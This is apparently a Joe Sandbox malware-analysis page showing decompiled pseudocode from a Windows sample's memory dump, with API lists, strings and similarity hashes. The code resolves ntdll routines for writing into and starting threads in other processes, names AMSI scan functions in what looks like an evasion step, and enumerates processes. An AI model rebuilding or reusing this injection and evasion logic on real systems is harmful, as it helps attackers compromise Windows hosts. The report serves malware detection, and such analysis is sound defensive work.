							_pop(_t1548);
							E03277C04(_v604,  *0x329e544, _t1548, _t1612);
							_t1125 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "RtlCreateUserThread");
							_t1549 =  *0x329a808; // 0x329e314
							 *_t1549 = _t1125;
							 *0x329e518 = 0;
							 *0x329e51c = 0;
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v612, E03264964(_v616));
							_push(_v612);
							E032647B0( &_v624,  *0x329e544, 0x327c094);
							E03264698( &_v620, E03264964(_v624));
							_pop(_t1554);
							E03277C04(_v620,  *0x329e544, _t1554, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanString");
							E03264824();
							E03264698( &_v628, E03264964(_v632));
							_push(_v628);
							E032647B0( &_v640,  *0x329e544, 0x327c094);
							E03264698( &_v636, E03264964(_v640));
							_pop(_t1559);
							E03277C04(_v636,  *0x329e544, _t1559, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("OpenSession");
							E03264824();
							E03264698( &_v644, E03264964(_v648));
							_push(_v644);
							E032647B0( &_v656,  *0x329e544, 0x327c094);
							E03264698( &_v652, E03264964(_v656));
							_pop(_t1564);
							E03277C04(_v652,  *0x329e544, _t1564, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("UacInitialize");
							E03264824();
							E03264698( &_v660, E03264964(_v664));
							_push(_v660);
							E032647B0( &_v672,  *0x329e544, 0x327c094);
							E03264698( &_v668, E03264964(_v672));
							_pop(_t1569);
							E03277C04(_v668,  *0x329e544, _t1569, _t1612);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v676, E03264964(_v680));
							_push(_v676);
							E032647B0( &_v688,  *0x329e544, 0x327c094);
							E03264698( &_v684, E03264964(_v688));
							_pop(_t1574);
							E03277C04(_v684,  *0x329e544, _t1574, _t1612);
							_t1198 =  *0x329e51c; // 0x0
							_t1199 =  *0x329e520; // 0x0
							_t1201 =  *0x329a808; // 0x329e314
							 *( *_t1201)( *0x329e53c, 0, 0, 0, 0, 0, _t1199, 0, 0x329e518, _t1198);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v692, E03264964(_v696));
							_push(_v692);
							E032647B0( &_v704,  *0x329e544, 0x327c094);
							E03264698( &_v700, E03264964(_v704));
							_pop(_t1579);
							E03277C04(_v700,  *0x329e544, _t1579, _t1612);
							_t1613 =  *0x329e518;
							if( *0x329e518 != 0) {
								_v5 = 1;
								_t1218 =  *0x329e518; // 0x0
								CloseHandle(_t1218);
							}
							goto L19;
						}
						_t1225 = _t907 + 1;
						_t1609 = _t1225;
						_v14 = _t1225;
						do {
							_t1226 =  *0x329e524; // 0x0
							_t1227 =  *0x329e524; // 0x0
							_t1228 =  *0x329e524; // 0x0
							E0327A580( *((intOrPtr*)(_t1228 + 0xc)) +  *0x329e534,  *((intOrPtr*)(_t1226 + 0x10)),  *((intOrPtr*)(_t1227 + 0x14)) +  *0x329e530);
							_push(0x327c094);
							_push( *0x329e544);
							_push("ScanBuffer");
							E03264824();
							E03264698( &_v372, E03264964(_v376));
							_push(_v372);
							E032647B0( &_v384,  *0x329e544, 0x327c094);
							E03264698( &_v380, E03264964(_v384));
							_pop(_t1589);
							E03277C04(_v380,  *0x329e544, _t1589, _t1609);
							_t1246 =  *0x329e524; // 0x0
							 *0x329e524 = _t1246 + 0x28;
							_t208 =  &_v14;
							 *_t208 = _v14 - 1;
							_t1610 =  *_t208;
						} while ( *_t208 != 0);
						goto L14;
					}
				}
			}

0x0327a6f5
0x0327a6f7
0x0327a6fc
0x0327a6fc
0x0327a6fe
0x0327a700
0x0327a700
0x0327a700
0x0327a703
0x0327a713
0x0327a714
0x0327a719
0x0327a71c
0x0327a726
0x0327a72b
0x0327a730
0x0327a732
0x0327a73f
0x0327a751
0x0327a759
0x0327a764
0x0327a776
0x0327a77e
0x0327a77f
0x0327a784
0x0327a789
0x0327a78b
0x0327a798
0x0327a7aa
0x0327a7b2
0x0327a7bd
0x0327a7cf
0x0327a7d7
0x0327a7d8
0x0327a7dd
0x0327a7e2
0x0327a7e4
0x0327a7f1
0x0327a803
0x0327a80b
0x0327a816
0x0327a828
0x0327a830
0x0327a831
0x0327a836
0x0327a83a
0x0327a83f
0x0327a841
0x0327a84e
0x0327a860
0x0327a868
0x0327a873
0x0327a885
0x0327a88d
0x0327a88e
0x0327a893
0x0327a898
0x0327a89a
0x0327a8a7
0x0327a8b9
0x0327a8c1
0x0327a8cc
0x0327a8de
0x0327a8e6
0x0327a8e7
0x0327a8ec
0x0327a8f1
0x0327a8f3
0x0327a900
0x0327a912
0x0327a91a
0x0327a925
0x0327a937
0x0327a93f
0x0327a940
0x0327a945
0x0327a94a
0x0327a94c
0x0327a959
0x0327a96b
0x0327a973
0x0327a97e
0x0327a990
0x0327a998
0x0327a999
0x0327a9a2
0x0327a9ab
0x0327a9b0
0x0327a9b8
0x0327a9ba
0x0327a9c1
0x0327a9d9
0x0327a9de
0x0327a9e4
0x0327a9f0
0x0327a9f6
0x0327a9fb
0x0327a9fd
0x0327aa0d
0x0327aa22
0x0327aa2a
0x0327aa38
0x0327aa50
0x0327aa5b
0x0327aa5c
0x0327aa61
0x0327aa66
0x0327aa68
0x0327aa78
0x0327aa90
0x0327aa9b
0x0327aaa9
0x0327aac1
0x0327aacc
0x0327aacd
0x0327aad2
0x0327aae8
0x0327aaed
0x0327aaf2
0x0327aaf4
0x0327ab04
0x0327ab1c
0x0327ab27
0x0327ab35
0x0327ab4d
0x0327ab58
0x0327ab59
0x0327ab5e
0x0327ab63
0x0327ab65
0x0327ab75
0x0327ab8d
0x0327ab98
0x0327aba6
0x0327abbe
0x0327abc9
0x0327abca
0x0327abcf
0x0327abd4
0x0327abd6
0x0327abe6
0x0327abfe
0x0327ac09
0x0327ac17
0x0327ac2f
0x0327ac3a
0x0327ac3b
0x0327ac40
0x0327ac43
0x0327be61
0x0327be6d
0x0327be7e
0x0327be8f
0x0327bea0
0x0327beb1
0x0327bec2
0x0327bed3
0x0327bee4
0x0327bee9
0x0327beee
0x0327bef0
0x0327bf00
0x0327bf18
0x0327bf23
0x0327bf31
0x0327bf49
0x0327bf54
0x0327bf55
0x0327bf5a
0x0327bf5f
0x0327bf61
0x0327bf71
0x0327bf89
0x0327bf94
0x0327bfa2
0x0327bfba
0x0327bfc5
0x0327bfc6
0x0327bfcb
0x0327bfd0
0x0327bfd2
0x0327bfe2
0x0327bffa
0x0327c005
0x0327c013
0x0327c02b
0x0327c036
0x0327c037
0x0327c03e
0x0327c041
0x0327c044
0x0327c054
0x0327c069
0x0327c069
0x0327ac55
0x0327ac65
0x0327ac6a
0x0327ac6f
0x0327ac71
0x0327ac81
0x0327ac99
0x0327aca4
0x0327acb2
0x0327acca
0x0327acd5
0x0327acd6
0x0327acdb
0x0327ace0
0x0327ace2
0x0327acf2
0x0327ad0a
0x0327ad15
0x0327ad23
0x0327ad3b
0x0327ad46
0x0327ad47
0x0327ad4c
0x0327ad51
0x0327ad53
0x0327ad63
0x0327ad7b
0x0327ad86
0x0327ad94
0x0327adac
0x0327adb7
0x0327adb8
0x0327adc4
0x00000000
0x00000000
0x0327add1
0x0327addb
0x0327adea
0x0327aded
0x0327adfd
0x0327be43
0x0327be4f
0x0327be50
0x0327be55
0x0327be5b
0x0327be5c
0x00000000
0x0327ae0e
0x0327ae17
0x0327ae2a
0x00000000
0x0327ae3f
0x0327ae47
0x0327ae4f
0x0327ae58
0x0327ae5e
0x0327ae65
0x0327be27
0x0327be27
0x0327be2c
0x0327be31
0x0327be32
0x0327be37
0x0327be3d
0x0327be3e
0x00000000
0x0327be3e
0x0327ae72
0x0327ae85
0x0327ae8a
0x0327ae8f
0x0327ae91
0x0327aea1
0x0327aeb9
0x0327aec4
0x0327aed2
0x0327aeea
0x0327aef5
0x0327aef6
0x0327aefb
0x0327af00
0x0327af02
0x0327af12
0x0327af2a
0x0327af35
0x0327af43
0x0327af5b
0x0327af66
0x0327af67
0x0327af6c
0x0327af71
0x0327af73
0x0327af83
0x0327af9b
0x0327afa6
0x0327afb4
0x0327afcc
0x0327afd7
0x0327afd8
0x0327afdd
0x0327afe4
0x00000000
0x00000000
0x0327aff1
0x0327b001
0x0327b006
0x0327b00b
0x0327b00d
0x0327b01d
0x0327b035
0x0327b040
0x0327b04e
0x0327b066
0x0327b071
0x0327b072
0x0327b077
0x0327b07c
0x0327b07e
0x0327b08e
0x0327b0a6
0x0327b0b1
0x0327b0bf
0x0327b0d7
0x0327b0e2
0x0327b0e3
0x0327b0e8
0x0327b0ed
0x0327b0ef
0x0327b0ff
0x0327b117
0x0327b122
0x0327b130
0x0327b148
0x0327b153
0x0327b154
0x0327b159
0x0327b160
0x0327bcbb
0x0327bcc0
0x0327bcc2
0x0327bcd2
0x0327bcea
0x0327bcf5
0x0327bd03
0x0327bd1b
0x0327bd26
0x0327bd27
0x0327bd2c
0x0327bd31
0x0327bd33
0x0327bd43
0x0327bd5b
0x0327bd66
0x0327bd74
0x0327bd8c
0x0327bd97
0x0327bd98
0x0327bd9d
0x0327bda2
0x0327bda4
0x0327bdb4
0x0327bdcc
0x0327bdd7
0x0327bde5
0x0327bdfd
0x0327be08
0x0327be09
0x0327be0e
0x0327be13
0x0327be18
0x0327be19
0x0327be1e
0x0327be21
0x0327be22
0x00000000
0x0327be22
0x0327b166
0x0327b16b
0x0327b16d
0x0327b17d
0x0327b195
0x0327b1a0
0x0327b1ae
0x0327b1c6
0x0327b1d1
0x0327b1d2
0x0327b1de
0x0327b1e3
0x0327b1eb
0x0327b1fd
0x0327b202
0x0327b20e
0x0327b212
0x0327b2ce
0x0327b2ce
0x0327b2d3
0x0327b2d5
0x0327b2e5
0x0327b2fd
0x0327b308
0x0327b316
0x0327b32e
0x0327b339
0x0327b33a
0x0327b342
0x0327b34a
0x0327b356
0x0327b35d
0x0327b364
0x0327b371
0x0327b371
0x0327b376
0x0327b37b
0x0327b37d
0x0327b38d
0x0327b3a5
0x0327b3b0
0x0327b3be
0x0327b3d6
0x0327b3e1
0x0327b3e2
0x0327b3e7
0x0327b3ec
0x0327b3ee
0x0327b3fe
0x0327b416
0x0327b421
0x0327b42f
0x0327b447
0x0327b452
0x0327b453
0x0327b458
0x0327b45d
0x0327b45f
0x0327b46f
0x0327b487
0x0327b492
0x0327b4a0
0x0327b4b8
0x0327b4c3
0x0327b4c4
0x0327b4d9
0x0327b4df
0x0327b4e4
0x0327b4e9
0x0327b4eb
0x0327b4fb
0x0327b513
0x0327b51e
0x0327b52c
0x0327b544
0x0327b54f
0x0327b550
0x0327b555
0x0327b55a
0x0327b55c
0x0327b56c
0x0327b584
0x0327b58f
0x0327b59d
0x0327b5b5
0x0327b5c0
0x0327b5c1
0x0327b5c6
0x0327b5cb
0x0327b5cd
0x0327b5dd
0x0327b5f5
0x0327b600
0x0327b60e
0x0327b626
0x0327b631
0x0327b632
0x0327b643
0x0327b648
0x0327b64d
0x0327b64f
0x0327b65f
0x0327b677
0x0327b682
0x0327b690
0x0327b6a8
0x0327b6b3
0x0327b6b4
0x0327b6b9
0x0327b6be
0x0327b6c0
0x0327b6d0
0x0327b6e8
0x0327b6f3
0x0327b701
0x0327b719
0x0327b724
0x0327b725
0x0327b72a
0x0327b72f
0x0327b731
0x0327b741
0x0327b759
0x0327b764
0x0327b772
0x0327b78a
0x0327b795
0x0327b796
0x0327b7ab
0x0327b7b0
0x0327b7b6
0x0327b7b8
0x0327b7bd
0x0327b7bf
0x0327b7cf
0x0327b7e7
0x0327b7f2
0x0327b800
0x0327b818
0x0327b823
0x0327b824
0x0327b829
0x0327b82e
0x0327b830
0x0327b840
0x0327b858
0x0327b863
0x0327b871
0x0327b889
0x0327b894
0x0327b895
0x0327b89a
0x0327b89f
0x0327b8a1
0x0327b8b1
0x0327b8c9
0x0327b8d4
0x0327b8e2
0x0327b8fa
0x0327b905
0x0327b906
0x0327b90b
0x0327b911
0x0327b917
0x0327b91d
0x0327b926
0x0327b92d
0x0327b92f
0x0327b934
0x0327b936
0x0327b946
0x0327b95e
0x0327b969
0x0327b977
0x0327b98f
0x0327b99a
0x0327b99b
0x0327b9b0
0x0327b9b5
0x0327b9bb
0x0327b9bf
0x0327b9c6
0x0327b9cb
0x0327b9d0
0x0327b9d2
0x0327b9e2
0x0327b9fa
0x0327ba05
0x0327ba13
0x0327ba2b
0x0327ba36
0x0327ba37
0x0327ba3c
0x0327ba41
0x0327ba43
0x0327ba53
0x0327ba6b
0x0327ba76
0x0327ba84
0x0327ba9c
0x0327baa7
0x0327baa8
0x0327baad
0x0327bab2
0x0327bab4
0x0327bac4
0x0327badc
0x0327bae7
0x0327baf5
0x0327bb0d
0x0327bb18
0x0327bb19
0x0327bb1e
0x0327bb23
0x0327bb25
0x0327bb35
0x0327bb4d
0x0327bb58
0x0327bb66
0x0327bb7e
0x0327bb89
0x0327bb8a
0x0327bb8f
0x0327bb94
0x0327bb96
0x0327bba6
0x0327bbbe
0x0327bbc9
0x0327bbd7
0x0327bbef
0x0327bbfa
0x0327bbfb
0x0327bc00
0x0327bc0d
0x0327bc20
0x0327bc27
0x0327bc29
0x0327bc2e
0x0327bc30
0x0327bc40
0x0327bc58
0x0327bc63
0x0327bc71
0x0327bc89
0x0327bc94
0x0327bc95
0x0327bc9a
0x0327bca1
0x0327bca7
0x0327bcab
0x0327bcb1
0x0327bcb1
0x00000000
0x0327bca1
0x0327b218
0x0327b218
0x0327b219
0x0327b21d
0x0327b21d
0x0327b225
0x0327b233
0x0327b241
0x0327b246
0x0327b24b
0x0327b24d
0x0327b25d
0x0327b275
0x0327b280
0x0327b28e
0x0327b2a6
0x0327b2b1
0x0327b2b2
0x0327b2b7
0x0327b2bf
0x0327b2c4
0x0327b2c4
0x0327b2c4
0x0327b2c4
0x00000000
0x0327b21d
0x0327ae2a

APIs

Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,0329E544,0327C094,UacInitialize,0329E544,0327C094,ScanString,0329E544,0327C094,UacInitialize,0329E544,0327C094,ScanString,0329E544), ref: 0327A9CE
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327A9D4

Part of subcall function 03262EE0: QueryPerformanceCounter.KERNEL32 ref: 03262EE4

GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000062,00000000,00000000), ref: 0327AC5A

Part of subcall function 032779BC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032779C9
Part of subcall function 032779BC: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032779CF

IsBadReadPtr.KERNEL32(00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327ADF6
IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327AE23
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327AE7A
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanBuffer,0329E544,0327C094,UacInitialize,0329E544,0327C094,ScanString,0329E544,0327C094,ScanBuffer,0329E544,0327C094,OpenSession,0329E544), ref: 0327B7A5
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327B7AB
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,0329E544,0327C094,?,?,00000062,00000000,00000000), ref: 0327B9AA
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0327B9B0
CloseHandle.KERNEL32(00000000,ScanBuffer,0329E544,0327C094,?,?,00000062,00000000,00000000), ref: 0327BCB1
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,0329E544,0327C094,ScanString,0329E544,0327C094,UacInitialize,0329E544,0327C094,OpenSession,0329E544,0327C094), ref: 0327BE22
GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327BE38
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000062,00000000,00000000), ref: 0327BE3E
GetCurrentProcess.KERNEL32(00000000,00000000,?,?,00000062,00000000,00000000), ref: 0327BE56
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,00000062,00000000,00000000), ref: 0327BE5C

Strings

ntdll, xrefs: 0327BE99, 0327BEAA, 0327BECC, 0327BEDD
I_QueryTagInformation, xrefs: 0327BEB6
ScanBuffer, xrefs: 0327A94C, 0327AC71, 0327AE91, 0327B00D, 0327B16D, 0327B24D, 0327B45F, 0327B5CD, 0327B731, 0327B8A1, 0327B936, 0327BB96, 0327BC30
RtlCreateUserThread, xrefs: 0327B9A0
advapi32, xrefs: 0327BEBB
C:\Windows\System32\ntdll.dll, xrefs: 0327A9C9, 0327B7A0, 0327B9A5
NtReadVirtualMemory, xrefs: 0327BE94
NtSetSecurityObject, xrefs: 0327BEC7
BCryptRegisterProvider, xrefs: 0327BE83
BCryptVerifySignature, xrefs: 0327BE61
Initialize, xrefs: 0327A78B, 0327A9FD, 0327AB65
NtOpenProcess, xrefs: 0327A9C4, 0327BED8
ScanString, xrefs: 0327A7E4, 0327A89A, 0327AA68, 0327ABD6, 0327B64F, 0327BA43, 0327BD33, 0327BF61
NtOpenObjectAuditAlarm, xrefs: 0327BEA5
BCryptQueryProviderRegistration, xrefs: 0327BE72
UacScan, xrefs: 0327B2D5
NtWriteVirtualMemory, xrefs: 0327B79B
UacInitialize, xrefs: 0327A841, 0327A8F3, 0327ACE2, 0327AF02, 0327B07E, 0327B37D, 0327B4EB, 0327B6C0, 0327B7BF, 0327B9D2, 0327BB25, 0327BCC2, 0327BEF0
bcrypt, xrefs: 0327BE66, 0327BE77, 0327BE88
OpenSession, xrefs: 0327A732, 0327AAF4, 0327AD53, 0327AF73, 0327B0EF, 0327B3EE, 0327B55C, 0327B830, 0327BAB4, 0327BDA4, 0327BFD2

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Handle$AddressModuleProc$CurrentFreeProcess$MemoryVirtual$LibraryRead$CloseCounterLoadPerformanceQuery
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 1521529492-530569836
Opcode ID: 6dec4b7f58b75d378b319bb6f3a7c37b4dae375d99339c1ffe243cb0db6e0145
Instruction ID: 4cc3b0a705797441538eed62a97772eab11326ec2a81458920118127718aa2f6
Opcode Fuzzy Hash: 6dec4b7f58b75d378b319bb6f3a7c37b4dae375d99339c1ffe243cb0db6e0145
Instruction Fuzzy Hash: CCD22038A212699FDB15FBB5DC90BDE73B5BF45700F1081A2A148AF214DAB09EC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0327A0C8 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0327A0C8() {

				if( *0x329e4c8 == 0) {
					 *0x329e4c8 = GetModuleHandleA("kernel32.dll");
					if( *0x329e4c8 != 0) {
						 *0x329e4cc = GetProcAddress( *0x329e4c8, "CreateToolhelp32Snapshot");
						 *0x329e4d0 = GetProcAddress( *0x329e4c8, "Heap32ListFirst");
						 *0x329e4d4 = GetProcAddress( *0x329e4c8, "Heap32ListNext");
						 *0x329e4d8 = GetProcAddress( *0x329e4c8, "Heap32First");
						 *0x329e4dc = GetProcAddress( *0x329e4c8, "Heap32Next");
						 *0x329e4e0 = GetProcAddress( *0x329e4c8, "Toolhelp32ReadProcessMemory");
						 *0x329e4e4 = GetProcAddress( *0x329e4c8, "Process32First");
						 *0x329e4e8 = GetProcAddress( *0x329e4c8, "Process32Next");
						 *0x329e4ec = GetProcAddress( *0x329e4c8, "Process32FirstW");
						 *0x329e4f0 = GetProcAddress( *0x329e4c8, "Process32NextW");
						 *0x329e4f4 = GetProcAddress( *0x329e4c8, "Thread32First");
						 *0x329e4f8 = GetProcAddress( *0x329e4c8, "Thread32Next");
						 *0x329e4fc = GetProcAddress( *0x329e4c8, "Module32First");
						 *0x329e500 = GetProcAddress( *0x329e4c8, "Module32Next");
						 *0x329e504 = GetProcAddress( *0x329e4c8, "Module32FirstW");
						 *0x329e508 = GetProcAddress( *0x329e4c8, "Module32NextW");
					}
				}
				if( *0x329e4c8 == 0 ||  *0x329e4cc == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x0327a0d1
0x0327a0e1
0x0327a0e6
0x0327a0f9
0x0327a10b
0x0327a11d
0x0327a12f
0x0327a141
0x0327a153
0x0327a165
0x0327a177
0x0327a189
0x0327a19b
0x0327a1ad
0x0327a1bf
0x0327a1d1
0x0327a1e3
0x0327a1f5
0x0327a207
0x0327a207
0x0327a0e6
0x0327a20f
0x0327a21d
0x0327a21e
0x0327a221
0x0327a221

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0327A34F,?,?,0327A3E1,00000000,0327A4BD), ref: 0327A0DC
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0327A0F4
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0327A106
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0327A118
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0327A12A
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0327A13C
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0327A14E
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0327A160
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0327A172
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0327A184
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0327A196
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0327A1A8
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0327A1BA
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0327A1CC
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0327A1DE
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0327A1F0
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0327A202

Strings

Toolhelp32ReadProcessMemory, xrefs: 0327A146
CreateToolhelp32Snapshot, xrefs: 0327A0EC
Process32NextW, xrefs: 0327A18E
Module32First, xrefs: 0327A1C4
Heap32ListNext, xrefs: 0327A110
Heap32ListFirst, xrefs: 0327A0FE
Thread32First, xrefs: 0327A1A0
Heap32First, xrefs: 0327A122
Module32NextW, xrefs: 0327A1FA
Process32First, xrefs: 0327A158
kernel32.dll, xrefs: 0327A0D7
Process32FirstW, xrefs: 0327A17C
Module32Next, xrefs: 0327A1D6
Heap32Next, xrefs: 0327A134
Module32FirstW, xrefs: 0327A1E8
Process32Next, xrefs: 0327A16A
Thread32Next, xrefs: 0327A1B2

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 25ada1ddf5ef50eb131927331738b934cdfce692ca83a253cfc233dd523bacb5
Instruction ID: db8d46e60164df7f1ac23460c1f019a78577189627d7e7712c1a221d49ef7f67
Opcode Fuzzy Hash: 25ada1ddf5ef50eb131927331738b934cdfce692ca83a253cfc233dd523bacb5
Instruction Fuzzy Hash: 2B31BEB4561710EFDB00FFB4F889E2D37A8BF06A10F51566AB410DF619D6B994D0CB22

Uniqueness

Uniqueness Score: -1.00%

Function 03277F54 Relevance: 43.9, APIs: 8, Strings: 16, Instructions: 1882
nativethreadprocessCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E03277F54(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				char _v92;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				char _v152;
				char _v156;
				void* _v160;
				void* _v164;
				void* _v168;
				void* _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr _v388;
				char _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				char _v408;
				char _v412;
				char _v416;
				intOrPtr _v420;
				char _v424;
				char _v428;
				char _v432;
				intOrPtr _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				char _v456;
				char _v460;
				char _v464;
				intOrPtr _v468;
				char _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				char _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				char _v504;
				char _v508;
				char _v512;
				intOrPtr _v516;
				char _v520;
				char _v524;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr _v548;
				char _v552;
				char _v556;
				char _v560;
				intOrPtr _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				intOrPtr _v628;
				char _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				char _v784;
				intOrPtr _v788;
				char _v792;
				char _v796;
				char _v800;
				intOrPtr _v804;
				char _v808;
				char _v812;
				char _v816;
				intOrPtr _v820;
				char _v824;
				char _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				char _v844;
				char _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
				char _v864;
				intOrPtr _v868;
				char _v872;
				char _v876;
				char _v880;
				intOrPtr _v884;
				char _v888;
				char _v892;
